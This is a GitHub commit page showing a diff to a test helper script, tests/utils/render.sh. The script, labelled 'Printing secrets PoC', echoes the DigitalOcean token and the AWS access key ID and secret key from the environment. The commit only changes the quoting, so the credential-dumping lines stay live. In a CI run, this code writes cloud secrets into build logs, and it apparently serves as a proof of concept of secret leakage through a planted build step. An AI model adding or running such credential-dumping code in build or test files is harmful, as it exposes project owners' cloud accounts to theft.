Skip to content

Commit d415bc3

Browse files
Update render.sh
Signed-off-by: Arshad Kazmi <arshadkazmi42@gmail.com>
1 parent 6b75ead commit d415bc3

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

tests/utils/render.sh

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -6,9 +6,9 @@ set -u
66

77
function main() {
88
echo "Printing secrets PoC"
9-
echo "DigitalOcean Token: $DIGITALOCEAN_TOKEN"
10-
echo "Aws key id: $AWS_ACCESS_KEY_ID"
11-
echo "Aws secret key: $AWS_SECRET_ACCESS_KEY"
9+
echo "DigitalOcean Token: \"$DIGITALOCEAN_TOKEN\""
10+
echo "Aws key id: \"$AWS_ACCESS_KEY_ID\""
11+
echo "Aws secret key: \"$AWS_SECRET_ACCESS_KEY\""
1212

1313
local template
1414
template="$1"

0 commit comments

Comments
 (0)